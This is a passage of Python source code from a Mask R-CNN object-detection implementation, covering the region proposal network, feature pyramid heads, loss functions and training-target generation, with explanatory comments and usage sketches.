"""
def __init__(self, config=None, **kwargs):
super(DetectionLayer, self).__init__(**kwargs)
self.config = config
def call(self, inputs):
rois = inputs[0]
mrcnn_class = inputs[1]
mrcnn_bbox = inputs[2]
image_meta = inputs[3]
# Get windows of images in normalized coordinates. Windows are the area
# in the image that excludes the padding.
# Use the shape of the first image in the batch to normalize the window
# because we know that all images get resized to the same size.
m = parse_image_meta_graph(image_meta)
image_shape = m['image_shape'][0]
window = norm_boxes_graph(m['window'], image_shape[:2])
# Run detection refinement graph on each item in the batch
detections_batch = utils.batch_slice(
[rois, mrcnn_class, mrcnn_bbox, window],
lambda x, y, w, z: refine_detections_graph(x, y, w, z, self.config),
self.config.IMAGES_PER_GPU)
# Reshape output
# [batch, num_detections, (y1, x1, y2, x2, class_id, class_score)] in
# normalized coordinates
return tf.reshape(
detections_batch,
[self.config.BATCH_SIZE, self.config.DETECTION_MAX_INSTANCES, 6])
def compute_output_shape(self, input_shape):
return (None, self.config.DETECTION_MAX_INSTANCES, 6)
############################################################
# Region Proposal Network (RPN)
############################################################
def rpn_graph(feature_map, anchors_per_location, anchor_stride):
"""Builds the computation graph of Region Proposal Network.
feature_map: backbone features [batch, height, width, depth]
anchors_per_location: number of anchors per pixel in the feature map
anchor_stride: Controls the density of anchors. Typically 1 (anchors for
every pixel in the feature map), or 2 (every other pixel).
Returns:
rpn_class_logits: [batch, H * W * anchors_per_location, 2] Anchor classifier logits (before softmax)
rpn_probs: [batch, H * W * anchors_per_location, 2] Anchor classifier probabilities.
rpn_bbox: [batch, H * W * anchors_per_location, (dy, dx, log(dh), log(dw))] Deltas to be
applied to anchors.
"""
# TODO: check if stride of 2 causes alignment issues if the feature map
# is not even.
# Shared convolutional base of the RPN
shared = KL.Conv2D(512, (3, 3), padding='same', activation='relu',
strides=anchor_stride,
name='rpn_conv_shared')(feature_map)
# Anchor Score. [batch, height, width, anchors per location * 2].
x = KL.Conv2D(2 * anchors_per_location, (1, 1), padding='valid',
activation='linear', name='rpn_class_raw')(shared)
# Reshape to [batch, anchors, 2]
rpn_class_logits = KL.Lambda(
lambda t: tf.reshape(t, [tf.shape(t)[0], -1, 2]))(x)
# Softmax on last dimension of BG/FG.
rpn_probs = KL.Activation(
"softmax", name="rpn_class_xxx")(rpn_class_logits)
# Bounding box refinement. [batch, H, W, anchors per location * depth]
# where depth is [x, y, log(w), log(h)]
x = KL.Conv2D(anchors_per_location * 4, (1, 1), padding="valid",
activation='linear', name='rpn_bbox_pred')(shared)
# Reshape to [batch, anchors, 4]
rpn_bbox = KL.Lambda(lambda t: tf.reshape(t, [tf.shape(t)[0], -1, 4]))(x)
return [rpn_class_logits, rpn_probs, rpn_bbox]
def build_rpn_model(anchor_stride, anchors_per_location, depth):
"""Builds a Keras model of the Region Proposal Network.
It wraps the RPN graph so it can be used multiple times with shared
weights.
anchors_per_location: number of anchors per pixel in the feature map
anchor_stride: Controls the density of anchors. Typically 1 (anchors for
every pixel in the feature map), or 2 (every other pixel).
depth: Depth of the backbone feature map.
Returns a Keras Model object. The model outputs, when called, are:
rpn_class_logits: [batch, H * W * anchors_per_location, 2] Anchor classifier logits (before softmax)
rpn_probs: [batch, H * W * anchors_per_location, 2] Anchor classifier probabilities.
rpn_bbox: [batch, H * W * anchors_per_location, (dy, dx, log(dh), log(dw))] Deltas to be
applied to anchors.
"""
input_feature_map = KL.Input(shape=[None, None, depth],
name="input_rpn_feature_map")
outputs = rpn_graph(input_feature_map, anchors_per_location, anchor_stride)
return KM.Model([input_feature_map], outputs, name="rpn_model")
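# Minimal usage sketch (illustrative values; assumes a 256-deep feature map
# and three anchor ratios, which are not prescribed here):
#
#   rpn = build_rpn_model(anchor_stride=1, anchors_per_location=3, depth=256)
#   rpn_class_logits, rpn_probs, rpn_bbox = rpn([feature_map])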
############################################################
# Feature Pyramid Network Heads
############################################################
def fpn_classifier_graph(rois, feature_maps, image_meta,
pool_size, num_classes, train_bn=True,
fc_layers_size=1024):
"""Builds the computation graph of the feature pyramid network classifier
and regressor heads.
rois: [batch, num_rois, (y1, x1, y2, x2)] Proposal boxes in normalized
coordinates.
feature_maps: List of feature maps from different layers of the pyramid,
[P2, P3, P4, P5]. Each has a different resolution.
image_meta: [batch, (meta data)] Image details. See compose_image_meta()
pool_size: The width of the square feature map generated from ROI Pooling.
num_classes: number of classes, which determines the depth of the results
train_bn: Boolean. Train or freeze Batch Norm layers
fc_layers_size: Size of the 2 FC layers
Returns:
logits: [batch, num_rois, NUM_CLASSES] classifier logits (before softmax)
probs: [batch, num_rois, NUM_CLASSES] classifier probabilities
bbox_deltas: [batch, num_rois, NUM_CLASSES, (dy, dx, log(dh), log(dw))] Deltas to apply to
proposal boxes
"""
# ROI Pooling
# Shape: [batch, num_rois, POOL_SIZE, POOL_SIZE, channels]
x = PyramidROIAlign([pool_size, pool_size],
name="roi_align_classifier")([rois, image_meta] + feature_maps)
# Two FC layers of size fc_layers_size (implemented with Conv2D for consistency)
x = KL.TimeDistributed(KL.Conv2D(fc_layers_size, (pool_size, pool_size), padding="valid"),
name="mrcnn_class_conv1")(x)
x = KL.TimeDistributed(BatchNorm(), name='mrcnn_class_bn1')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2D(fc_layers_size, (1, 1)),
name="mrcnn_class_conv2")(x)
x = KL.TimeDistributed(BatchNorm(), name='mrcnn_class_bn2')(x, training=train_bn)
x = KL.Activation('relu')(x)
shared = KL.Lambda(lambda x: K.squeeze(K.squeeze(x, 3), 2),
name="pool_squeeze")(x)
# Classifier head
mrcnn_class_logits = KL.TimeDistributed(KL.Dense(num_classes),
name='mrcnn_class_logits')(shared)
mrcnn_probs = KL.TimeDistributed(KL.Activation("softmax"),
name="mrcnn_class")(mrcnn_class_logits)
# BBox head
# [batch, num_rois, NUM_CLASSES * (dy, dx, log(dh), log(dw))]
x = KL.TimeDistributed(KL.Dense(num_classes * 4, activation='linear'),
name='mrcnn_bbox_fc')(shared)
# Reshape to [batch, num_rois, NUM_CLASSES, (dy, dx, log(dh), log(dw))]
s = K.int_shape(x)
s1 = s[1] if s[1] is not None else -1
mrcnn_bbox = KL.Reshape((s1, num_classes, 4), name="mrcnn_bbox")(x)
return mrcnn_class_logits, mrcnn_probs, mrcnn_bbox
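# Shape sketch (hypothetical sizes, e.g. num_rois=200 and num_classes=81):
#   mrcnn_class_logits: [batch, 200, 81]
#   mrcnn_probs:        [batch, 200, 81]
#   mrcnn_bbox:         [batch, 200, 81, 4]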
def build_fpn_mask_graph(rois, feature_maps, image_meta,
pool_size, num_classes, train_bn=True):
"""Builds the computation graph of the mask head of Feature Pyramid Network.
rois: [batch, num_rois, (y1, x1, y2, x2)] Proposal boxes in normalized
coordinates.
feature_maps: List of feature maps from different layers of the pyramid,
[P2, P3, P4, P5]. Each has a different resolution.
image_meta: [batch, (meta data)] Image details. See compose_image_meta()
pool_size: The width of the square feature map generated from ROI Pooling.
num_classes: number of classes, which determines the depth of the results
train_bn: Boolean. Train or freeze Batch Norm layers
Returns: Masks [batch, num_rois, MASK_POOL_SIZE*2, MASK_POOL_SIZE*2, NUM_CLASSES]
(the transposed convolution below doubles the pooled spatial size)
"""
# ROI Pooling
# Shape: [batch, num_rois, MASK_POOL_SIZE, MASK_POOL_SIZE, channels]
x = PyramidROIAlign([pool_size, pool_size],
name="roi_align_mask")([rois, image_meta] + feature_maps)
# Conv layers
x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"),
name="mrcnn_mask_conv1")(x)
x = KL.TimeDistributed(BatchNorm(),
name='mrcnn_mask_bn1')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"),
name="mrcnn_mask_conv2")(x)
x = KL.TimeDistributed(BatchNorm(),
name='mrcnn_mask_bn2')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"),
name="mrcnn_mask_conv3")(x)
x = KL.TimeDistributed(BatchNorm(),
name='mrcnn_mask_bn3')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"),
name="mrcnn_mask_conv4")(x)
x = KL.TimeDistributed(BatchNorm(),
name='mrcnn_mask_bn4')(x, training=train_bn)
x = KL.Activation('relu')(x)
x = KL.TimeDistributed(KL.Conv2DTranspose(256, (2, 2), strides=2, activation="relu"),
name="mrcnn_mask_deconv")(x)
x = KL.TimeDistributed(KL.Conv2D(num_classes, (1, 1), strides=1, activation="sigmoid"),
name="mrcnn_mask")(x)
return x
############################################################
# Loss Functions
############################################################
def smooth_l1_loss(y_true, y_pred):
"""Implements Smooth-L1 loss.
y_true and y_pred are typically: [N, 4], but could be any shape.
"""
diff = K.abs(y_true - y_pred)
less_than_one = K.cast(K.less(diff, 1.0), "float32")
loss = (less_than_one * 0.5 * diff**2) + (1 - less_than_one) * (diff - 0.5)
return loss
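# Worked example (hypothetical values; assumes eager TF2 execution):
#
#   y_true = tf.constant([[0.1, 0.2, 0.3, 0.4]])
#   y_pred = tf.constant([[0.1, 0.5, 2.0, 0.4]])
#   smooth_l1_loss(y_true, y_pred)
#   # -> [[0.0, 0.045, 1.2, 0.0]]
#   # |diff| < 1 uses the quadratic branch (0.5 * 0.3**2 = 0.045);
#   # |diff| >= 1 uses the linear branch (1.7 - 0.5 = 1.2).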
def rpn_class_loss_graph(rpn_match, rpn_class_logits):
"""RPN anchor classifier loss.
rpn_match: [batch, anchors, 1]. Anchor match type. 1=positive,
-1=negative, 0=neutral anchor.
rpn_class_logits: [batch, anchors, 2]. RPN classifier logits for BG/FG.
"""
# Squeeze last dim to simplify
rpn_match = tf.squeeze(rpn_match, -1)
# Get anchor classes. Convert the -1/+1 match to 0/1 values.
anchor_class = K.cast(K.equal(rpn_match, 1), tf.int32)
# Positive and Negative anchors contribute to the loss,
# but neutral anchors (match value = 0) don't.
indices = tf.where(K.not_equal(rpn_match, 0))
# Pick rows that contribute to the loss and filter out the rest.
rpn_class_logits = tf.gather_nd(rpn_class_logits, indices)
anchor_class = tf.gather_nd(anchor_class, indices)
# Cross entropy loss
loss = K.sparse_categorical_crossentropy(target=anchor_class,
output=rpn_class_logits,
from_logits=True)
loss = K.switch(tf.size(loss) > 0, K.mean(loss), tf.constant(0.0))
return loss
def rpn_bbox_loss_graph(config, target_bbox, rpn_match, rpn_bbox):
"""Return the RPN bounding box loss graph.
config: the model config object.
target_bbox: [batch, max positive anchors, (dy, dx, log(dh), log(dw))].
Uses 0 padding to fill in unused bbox deltas.
rpn_match: [batch, anchors, 1]. Anchor match type. 1=positive,
-1=negative, 0=neutral anchor.
rpn_bbox: [batch, anchors, (dy, dx, log(dh), log(dw))]
"""
# Positive anchors contribute to the loss, but negative and
# neutral anchors (match value of 0 or -1) don't.
rpn_match = K.squeeze(rpn_match, -1)
indices = tf.where(K.equal(rpn_match, 1))
# Pick bbox deltas that contribute to the loss
rpn_bbox = tf.gather_nd(rpn_bbox, indices)
# Trim target bounding box deltas to the same length as rpn_bbox.
batch_counts = K.sum(K.cast(K.equal(rpn_match, 1), tf.int32), axis=1)
target_bbox = batch_pack_graph(target_bbox, batch_counts,
config.IMAGES_PER_GPU)
loss = smooth_l1_loss(target_bbox, rpn_bbox)
loss = K.switch(tf.size(loss) > 0, K.mean(loss), tf.constant(0.0))
return loss
def mrcnn_class_loss_graph(target_class_ids, pred_class_logits,
active_class_ids):
"""Loss for the classifier head of Mask RCNN.
target_class_ids: [batch, num_rois]. Integer class IDs. Uses zero
padding to fill in the array.
pred_class_logits: [batch, num_rois, num_classes]
active_class_ids: [batch, num_classes]. Has a value of 1 for
classes that are in the dataset of the image, and 0
for classes that are not in the dataset.
"""
# During model building, Keras calls this function with
# target_class_ids of type float32. Unclear why. Cast it
# to int to get around it.
target_class_ids = tf.cast(target_class_ids, 'int64')
# Find predictions of classes that are not in the dataset.
pred_class_ids = tf.argmax(pred_class_logits, axis=2)
# TODO: Update this line to work with batch > 1. Right now it assumes all
# images in a batch have the same active_class_ids
pred_active = tf.gather(active_class_ids[0], pred_class_ids)
# Loss
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=target_class_ids, logits=pred_class_logits)
# Erase losses of predictions of classes that are not in the active
# classes of the image.
loss = loss * pred_active
# Compute loss mean. Use only predictions that contribute
# to the loss to get a correct mean.
loss = tf.reduce_sum(loss) / tf.reduce_sum(pred_active)
return loss
def mrcnn_bbox_loss_graph(target_bbox, target_class_ids, pred_bbox):
"""Loss for Mask R-CNN bounding box refinement.
target_bbox: [batch, num_rois, (dy, dx, log(dh), log(dw))]
target_class_ids: [batch, num_rois]. Integer class IDs.
pred_bbox: [batch, num_rois, num_classes, (dy, dx, log(dh), log(dw))]
"""
# Reshape to merge batch and roi dimensions for simplicity.
target_class_ids = K.reshape(target_class_ids, (-1,))
target_bbox = K.reshape(target_bbox, (-1, 4))
pred_bbox = K.reshape(pred_bbox, (-1, K.int_shape(pred_bbox)[2], 4))
# Only positive ROIs contribute to the loss. And only
# the right class_id of each ROI. Get their indices.
positive_roi_ix = tf.where(target_class_ids > 0)[:, 0]
positive_roi_class_ids = tf.cast(
tf.gather(target_class_ids, positive_roi_ix), tf.int64)
indices = tf.stack([positive_roi_ix, positive_roi_class_ids], axis=1)
# Gather the deltas (predicted and true) that contribute to loss
target_bbox = tf.gather(target_bbox, positive_roi_ix)
pred_bbox = tf.gather_nd(pred_bbox, indices)
# Smooth-L1 Loss
loss = K.switch(tf.size(target_bbox) > 0,
smooth_l1_loss(y_true=target_bbox, y_pred=pred_bbox),
tf.constant(0.0))
loss = K.mean(loss)
return loss
def mrcnn_mask_loss_graph(target_masks, target_class_ids, pred_masks):
"""Mask binary cross-entropy loss for the masks head.
target_masks: [batch, num_rois, height, width].
A float32 tensor of values 0 or 1. Uses zero padding to fill array.
target_class_ids: [batch, num_rois]. Integer class IDs. Zero padded.
pred_masks: [batch, proposals, height, width, num_classes] float32 tensor
with values from 0 to 1.
"""
# Reshape for simplicity. Merge first two dimensions into one.
target_class_ids = K.reshape(target_class_ids, (-1,))
mask_shape = tf.shape(target_masks)
target_masks = K.reshape(target_masks, (-1, mask_shape[2], mask_shape[3]))
pred_shape = tf.shape(pred_masks)
pred_masks = K.reshape(pred_masks,
(-1, pred_shape[2], pred_shape[3], pred_shape[4]))
# Permute predicted masks to [N, num_classes, height, width]
pred_masks = tf.transpose(pred_masks, [0, 3, 1, 2])
# Only positive ROIs contribute to the loss. And only
# the class specific mask of each ROI.
positive_ix = tf.where(target_class_ids > 0)[:, 0]
positive_class_ids = tf.cast(
tf.gather(target_class_ids, positive_ix), tf.int64)
indices = tf.stack([positive_ix, positive_class_ids], axis=1)
# Gather the masks (predicted and true) that contribute to loss
y_true = tf.gather(target_masks, positive_ix)
y_pred = tf.gather_nd(pred_masks, indices)
# Compute binary cross entropy. If no positive ROIs, then return 0.
# shape: [batch, roi, num_classes]
loss = K.switch(tf.size(y_true) > 0,
K.binary_crossentropy(target=y_true, output=y_pred),
tf.constant(0.0))
loss = K.mean(loss)
return loss
############################################################
# Data Generator
############################################################
def load_image_gt(dataset, config, image_id, augmentation=None,
use_mini_mask=False):
"""Load and return ground truth data for an image (image, mask, bounding boxes).
augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation.
For example, passing imgaug.augmenters.Fliplr(0.5) flips images
right/left 50% of the time.
use_mini_mask: If False, returns full-size masks that are the same height
and width as the original image. These can be big, for example
1024x1024x100 (for 100 instances). Mini masks are smaller, typically,
224x224 and are generated by extracting the bounding box of the
object and resizing it to MINI_MASK_SHAPE.
Returns:
image: [height, width, 3]
image_meta: Image details, including the original shape of the image
before resizing and cropping. See compose_image_meta()
class_ids: [instance_count] Integer class IDs
bbox: [instance_count, (y1, x1, y2, x2)]
mask: [height, width, instance_count]. The height and width are those
of the image unless use_mini_mask is True, in which case they are
defined in MINI_MASK_SHAPE.
"""
# Load image and mask
image = dataset.load_image(image_id)
mask, class_ids = dataset.load_mask(image_id)
original_shape = image.shape
image, window, scale, padding, crop = utils.resize_image(
image,
min_dim=config.IMAGE_MIN_DIM,
min_scale=config.IMAGE_MIN_SCALE,
max_dim=config.IMAGE_MAX_DIM,
mode=config.IMAGE_RESIZE_MODE)
mask = utils.resize_mask(mask, scale, padding, crop)
# Augmentation
# This requires the imgaug lib (https://github.com/aleju/imgaug)
if augmentation:
import imgaug
# Augmenters that are safe to apply to masks
# Some, such as Affine, have settings that make them unsafe, so always
# test your augmentation on masks
MASK_AUGMENTERS = ["Sequential", "SomeOf", "OneOf", "Sometimes",
"Fliplr", "Flipud", "CropAndPad",
"Affine", "PiecewiseAffine"]
def hook(images, augmenter, parents, default):
"""Determines which augmenters to apply to masks."""
return augmenter.__class__.__name__ in MASK_AUGMENTERS
# Store shapes before augmentation to compare
image_shape = image.shape
mask_shape = mask.shape
# Make augmenters deterministic to apply similarly to images and masks
det = augmentation.to_deterministic()
image = det.augment_image(image)
# Change mask to np.uint8 because imgaug doesn't support np.bool
mask = det.augment_image(mask.astype(np.uint8),
hooks=imgaug.HooksImages(activator=hook))
# Verify that shapes didn't change
assert image.shape == image_shape, "Augmentation shouldn't change image size"
assert mask.shape == mask_shape, "Augmentation shouldn't change mask size"
# Change mask back to bool
mask = mask.astype(bool)  # np.bool was removed in recent NumPy versions
# Some instances may end up with all-zero masks if the corresponding object
# was cropped out by resizing or augmentation. Filter those instances out.
_idx = np.sum(mask, axis=(0, 1)) > 0
mask = mask[:, :, _idx]
class_ids = class_ids[_idx]
# Bounding boxes: [num_instances, (y1, x1, y2, x2)]. Empty masks were
# filtered out above, so every box should have nonzero area.
bbox = utils.extract_bboxes(mask)
# Active classes
# Different datasets have different classes, so track the
# classes supported in the dataset of this image.
active_class_ids = np.zeros([dataset.num_classes], dtype=np.int32)
source_class_ids = dataset.source_class_ids[dataset.image_info[image_id]["source"]]
active_class_ids[source_class_ids] = 1
# Resize masks to smaller size to reduce memory usage
if use_mini_mask:
mask = utils.minimize_mask(bbox, mask, config.MINI_MASK_SHAPE)
# Image meta data
image_meta = compose_image_meta(image_id, original_shape, image.shape,
window, scale, active_class_ids)
return image, image_meta, class_ids, bbox, mask
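# Usage sketch (assumes a prepared Dataset object, a valid image_id, and that
# imgaug is importable; the augmentation shown is just one option):
#
#   image, image_meta, class_ids, bbox, mask = load_image_gt(
#       dataset, config, image_id,
#       augmentation=imgaug.augmenters.Fliplr(0.5),
#       use_mini_mask=config.USE_MINI_MASK)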
def build_detection_targets(rpn_rois, gt_class_ids, gt_boxes, gt_masks, config):
"""Generate targets for training Stage 2 classifier and mask heads.
This is not used in normal training. It's useful for debugging or to train
the Mask RCNN heads without using the RPN head.
Inputs:
rpn_rois: [N, (y1, x1, y2, x2)] proposal boxes.
gt_class_ids: [instance count] Integer class IDs
gt_boxes: [instance count, (y1, x1, y2, x2)]
gt_masks: [height, width, instance count] Ground truth masks. Can be full
size or mini-masks.
Returns:
rois: [TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)]
class_ids: [TRAIN_ROIS_PER_IMAGE]. Integer class IDs.
bboxes: [TRAIN_ROIS_PER_IMAGE, NUM_CLASSES, (y, x, log(h), log(w))]. Class-specific
bbox refinements.
masks: [TRAIN_ROIS_PER_IMAGE, height, width, NUM_CLASSES]. Class specific masks cropped
to bbox boundaries and resized to neural network output size.
"""
assert rpn_rois.shape[0] > 0
assert gt_class_ids.dtype == np.int32, "Expected int but got {}".format(
gt_class_ids.dtype)
assert gt_boxes.dtype == np.int32, "Expected int but got {}".format(
gt_boxes.dtype)
assert gt_masks.dtype == np.bool_, "Expected bool but got {}".format(
gt_masks.dtype)
# It's common to add GT Boxes to ROIs but we don't do that here because
# according to XinLei Chen's paper, it doesn't help.
# Trim empty padding in gt_boxes and gt_masks parts
instance_ids = np.where(gt_class_ids > 0)[0]
assert instance_ids.shape[0] > 0, "Image must contain instances."
gt_class_ids = gt_class_ids[instance_ids]
gt_boxes = gt_boxes[instance_ids]
gt_masks = gt_masks[:, :, instance_ids]
# Compute areas of ROIs and ground truth boxes.
rpn_roi_area = (rpn_rois[:, 2] - rpn_rois[:, 0]) * \
(rpn_rois[:, 3] - rpn_rois[:, 1])
gt_box_area = (gt_boxes[:, 2] - gt_boxes[:, 0]) * \
(gt_boxes[:, 3] - gt_boxes[:, 1])
# Compute overlaps [rpn_rois, gt_boxes]
overlaps = np.zeros((rpn_rois.shape[0], gt_boxes.shape[0]))
for i in range(overlaps.shape[1]):
gt = gt_boxes[i]
overlaps[:, i] = utils.compute_iou(
gt, rpn_rois, gt_box_area[i], rpn_roi_area)
# Assign ROIs to GT boxes
rpn_roi_iou_argmax = np.argmax(overlaps, axis=1)
rpn_roi_iou_max = overlaps[np.arange(
overlaps.shape[0]), rpn_roi_iou_argmax]
# GT box assigned to each ROI
rpn_roi_gt_boxes = gt_boxes[rpn_roi_iou_argmax]
rpn_roi_gt_class_ids = gt_class_ids[rpn_roi_iou_argmax]
# Positive ROIs are those with >= 0.5 IoU with a GT box.
fg_ids = np.where(rpn_roi_iou_max > 0.5)[0]
# Negative ROIs are those with max IoU 0.1-0.5 (hard example mining)
# TODO: To hard example mine or not to hard example mine, that's the question
# bg_ids = np.where((rpn_roi_iou_max >= 0.1) & (rpn_roi_iou_max < 0.5))[0]
bg_ids = np.where(rpn_roi_iou_max < 0.5)[0]
# Subsample ROIs. Aim for 33% foreground.
# FG
fg_roi_count = int(config.TRAIN_ROIS_PER_IMAGE * config.ROI_POSITIVE_RATIO)
if fg_ids.shape[0] > fg_roi_count:
keep_fg_ids = np.random.choice(fg_ids, fg_roi_count, replace=False)
else:
keep_fg_ids = fg_ids
# BG
remaining = config.TRAIN_ROIS_PER_IMAGE - keep_fg_ids.shape[0]
if bg_ids.shape[0] > remaining:
keep_bg_ids = np.random.choice(bg_ids, remaining, replace=False)
else:
keep_bg_ids = bg_ids
# Combine indices of ROIs to keep
keep = np.concatenate([keep_fg_ids, keep_bg_ids])
# Need more?
remaining = config.TRAIN_ROIS_PER_IMAGE - keep.shape[0]
if remaining > 0:
# Looks like we don't have enough samples to maintain the desired
# balance. Reduce requirements and fill in the rest. This is
# likely different from the Mask RCNN paper.
# There is a small chance we have neither fg nor bg samples.
if keep.shape[0] == 0:
# Pick bg regions with easier IoU threshold
bg_ids = np.where(rpn_roi_iou_max < 0.5)[0]
assert bg_ids.shape[0] >= remaining
keep_bg_ids = np.random.choice(bg_ids, remaining, replace=False)
assert keep_bg_ids.shape[0] == remaining
keep = np.concatenate([keep, keep_bg_ids])
else:
# Fill the rest with repeated bg rois.
keep_extra_ids = np.random.choice(
keep_bg_ids, remaining, replace=True)
keep = np.concatenate([keep, keep_extra_ids])
assert keep.shape[0] == config.TRAIN_ROIS_PER_IMAGE, \
"keep doesn't match ROI batch size {}, {}".format(
keep.shape[0], config.TRAIN_ROIS_PER_IMAGE)
# Reset the gt boxes assigned to BG ROIs.
rpn_roi_gt_boxes[keep_bg_ids, :] = 0
rpn_roi_gt_class_ids[keep_bg_ids] = 0
# For each kept ROI, assign a class_id, and for FG ROIs also add bbox refinement.
rois = rpn_rois[keep]
roi_gt_boxes = rpn_roi_gt_boxes[keep]
roi_gt_class_ids = rpn_roi_gt_class_ids[keep]
roi_gt_assignment = rpn_roi_iou_argmax[keep]
# Class-aware bbox deltas. [y, x, log(h), log(w)]
bboxes = np.zeros((config.TRAIN_ROIS_PER_IMAGE,
config.NUM_CLASSES, 4), dtype=np.float32)
pos_ids = np.where(roi_gt_class_ids > 0)[0]
bboxes[pos_ids, roi_gt_class_ids[pos_ids]] = utils.box_refinement(
rois[pos_ids], roi_gt_boxes[pos_ids, :4])
# Normalize bbox refinements
bboxes /= config.BBOX_STD_DEV
# Generate class-specific target masks
masks = np.zeros((config.TRAIN_ROIS_PER_IMAGE, config.MASK_SHAPE[0], config.MASK_SHAPE[1], config.NUM_CLASSES),
dtype=np.float32)
for i in pos_ids:
class_id = roi_gt_class_ids[i]
assert class_id > 0, "class id must be greater than 0"
gt_id = roi_gt_assignment[i]
class_mask = gt_masks[:, :, gt_id]
if config.USE_MINI_MASK:
# Create a mask placeholder, the size of the image
placeholder = np.zeros(config.IMAGE_SHAPE[:2], dtype=bool)
# GT box
gt_y1, gt_x1, gt_y2, gt_x2 = gt_boxes[gt_id]
gt_w = gt_x2 - gt_x1
gt_h = gt_y2 - gt_y1
# Resize mini mask to size of GT box
placeholder[gt_y1:gt_y2, gt_x1:gt_x2] = \
np.round(utils.resize(class_mask, (gt_h, gt_w))).astype(bool)
# Place the mini mask in the placeholder
class_mask = placeholder
# Pick part of the mask and resize it
y1, x1, y2, x2 = rois[i].astype(np.int32)
m = class_mask[y1:y2, x1:x2]
mask = utils.resize(m, config.MASK_SHAPE)
masks[i, :, :, class_id] = mask
return rois, roi_gt_class_ids, bboxes, masks
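# Usage sketch (debugging only; rpn_rois can come from generate_random_rois
# below, and the ground truth arrays from load_image_gt):
#
#   rois, class_ids, bboxes, masks = build_detection_targets(
#       rpn_rois, gt_class_ids, gt_boxes, gt_masks, config)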
def build_rpn_targets(image_shape, anchors, gt_class_ids, gt_boxes, config):
"""Given the anchors and GT boxes, compute overlaps and identify positive
anchors and deltas to refine them to match their corresponding GT boxes.
anchors: [num_anchors, (y1, x1, y2, x2)]
gt_class_ids: [num_gt_boxes] Integer class IDs.
gt_boxes: [num_gt_boxes, (y1, x1, y2, x2)]
Returns:
rpn_match: [N] (int32) matches between anchors and GT boxes.
1 = positive anchor, -1 = negative anchor, 0 = neutral
rpn_bbox: [N, (dy, dx, log(dh), log(dw))] Anchor bbox deltas.
"""
# RPN Match: 1 = positive anchor, -1 = negative anchor, 0 = neutral
rpn_match = np.zeros([anchors.shape[0]], dtype=np.int32)
# RPN bounding boxes: [max anchors per image, (dy, dx, log(dh), log(dw))]
rpn_bbox = np.zeros((config.RPN_TRAIN_ANCHORS_PER_IMAGE, 4))
# Handle COCO crowds
# A crowd box in COCO is a bounding box around several instances. Exclude
# them from training. A crowd box is given a negative class ID.
crowd_ix = np.where(gt_class_ids < 0)[0]
if crowd_ix.shape[0] > 0:
# Filter out crowds from ground truth class IDs and boxes
non_crowd_ix = np.where(gt_class_ids > 0)[0]
crowd_boxes = gt_boxes[crowd_ix]
gt_class_ids = gt_class_ids[non_crowd_ix]
gt_boxes = gt_boxes[non_crowd_ix]
# Compute overlaps with crowd boxes [anchors, crowds]
crowd_overlaps = utils.compute_overlaps(anchors, crowd_boxes)
crowd_iou_max = np.amax(crowd_overlaps, axis=1)
no_crowd_bool = (crowd_iou_max < 0.001)
else:
# All anchors don't intersect a crowd
no_crowd_bool = np.ones([anchors.shape[0]], dtype=bool)
# Compute overlaps [num_anchors, num_gt_boxes]
overlaps = utils.compute_overlaps(anchors, gt_boxes)
# Match anchors to GT Boxes
# If an anchor overlaps a GT box with IoU >= 0.7 then it's positive.
# If an anchor overlaps a GT box with IoU < 0.3 then it's negative.
# Neutral anchors are those that don't match the conditions above,
# and they don't influence the loss function.
# However, don't keep any GT box unmatched (rare, but happens). Instead,
# match it to the closest anchor (even if its max IoU is < 0.3).
#
# 1. Set negative anchors first. They get overwritten below if a GT box is
# matched to them. Skip boxes in crowd areas.
anchor_iou_argmax = np.argmax(overlaps, axis=1)
anchor_iou_max = overlaps[np.arange(overlaps.shape[0]), anchor_iou_argmax]
rpn_match[(anchor_iou_max < 0.3) & (no_crowd_bool)] = -1
# 2. Set an anchor for each GT box (regardless of IoU value).
# If multiple anchors have the same IoU, match all of them.
gt_iou_argmax = np.argwhere(overlaps == np.max(overlaps, axis=0))[:, 0]
rpn_match[gt_iou_argmax] = 1
# 3. Set anchors with high overlap as positive.
rpn_match[anchor_iou_max >= 0.7] = 1
# Subsample to balance positive and negative anchors
# Don't let positives be more than half the anchors
ids = np.where(rpn_match == 1)[0]
extra = len(ids) - (config.RPN_TRAIN_ANCHORS_PER_IMAGE // 2)
if extra > 0:
# Reset the extra ones to neutral
ids = np.random.choice(ids, extra, replace=False)
rpn_match[ids] = 0
# Same for negative proposals
ids = np.where(rpn_match == -1)[0]
extra = len(ids) - (config.RPN_TRAIN_ANCHORS_PER_IMAGE -
np.sum(rpn_match == 1))
if extra > 0:
# Reset the extra ones to neutral
ids = np.random.choice(ids, extra, replace=False)
rpn_match[ids] = 0
# For positive anchors, compute shift and scale needed to transform them
# to match the corresponding GT boxes.
ids = np.where(rpn_match == 1)[0]
ix = 0 # index into rpn_bbox
# TODO: use box_refinement() rather than duplicating the code here
for i, a in zip(ids, anchors[ids]):
# Closest gt box (it might have IoU < 0.7)
gt = gt_boxes[anchor_iou_argmax[i]]
# Convert coordinates to center plus width/height.
# GT Box
gt_h = gt[2] - gt[0]
gt_w = gt[3] - gt[1]
gt_center_y = gt[0] + 0.5 * gt_h
gt_center_x = gt[1] + 0.5 * gt_w
# Anchor
a_h = a[2] - a[0]
a_w = a[3] - a[1]
a_center_y = a[0] + 0.5 * a_h
a_center_x = a[1] + 0.5 * a_w
# Compute the bbox refinement that the RPN should predict.
rpn_bbox[ix] = [
(gt_center_y - a_center_y) / a_h,
(gt_center_x - a_center_x) / a_w,
np.log(gt_h / a_h),
np.log(gt_w / a_w),
]
# Normalize
rpn_bbox[ix] /= config.RPN_BBOX_STD_DEV
ix += 1
return rpn_match, rpn_bbox
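# Worked example of the refinement computed above (before normalization):
# anchor (y1, x1, y2, x2) = (0, 0, 10, 10) and GT box (2, 2, 12, 12) have the
# same 10x10 size but centers shifted by +2 on each axis, so the target is
# [dy, dx, log(dh), log(dw)] = [2/10, 2/10, log(1), log(1)] = [0.2, 0.2, 0, 0].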
